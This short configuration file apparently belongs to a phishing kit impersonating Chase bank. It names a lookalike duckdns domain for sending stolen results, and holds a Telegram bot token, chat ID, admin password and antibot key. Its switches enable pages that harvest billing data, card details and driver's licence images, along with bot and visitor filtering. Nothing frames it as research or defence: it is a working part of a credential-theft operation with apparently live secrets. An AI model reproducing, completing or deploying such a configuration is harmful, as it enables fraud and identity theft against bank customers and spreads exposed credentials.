[config]
email_result_config = " admin@auth04-verify-chase06e.duckdns.org"
redirect_password = 
result_from_email = "chase@auth04-verify-chase06e.duckdns.org"
result_pin = "123456"
antibot_pw_key = "8956179ac6bb011946f9021cdc24787f"
ipqualityscore_key = 
telegram_token = "1083833127:AAFpIM0Fhmkj5zYp_AWBkfY2bL2zea4iUw8"
telegram_chatid = "933017721"
; telegram_chatid = "1208867891"
admin_password = "test52225"
[onoff]
redirect = "off"
default_protection = 
ipqualityscore = 
myip_ms = "on"
antibot_pw = "on"
lock_country = "off"
email_result = "on"
telegram_result = "on"
true_hotmail_login = "off"
valid_email_true = "off"
Show_billing_page = "on"
Show_card_page = "on"
get_DL = "on"
only_mobile = "off"
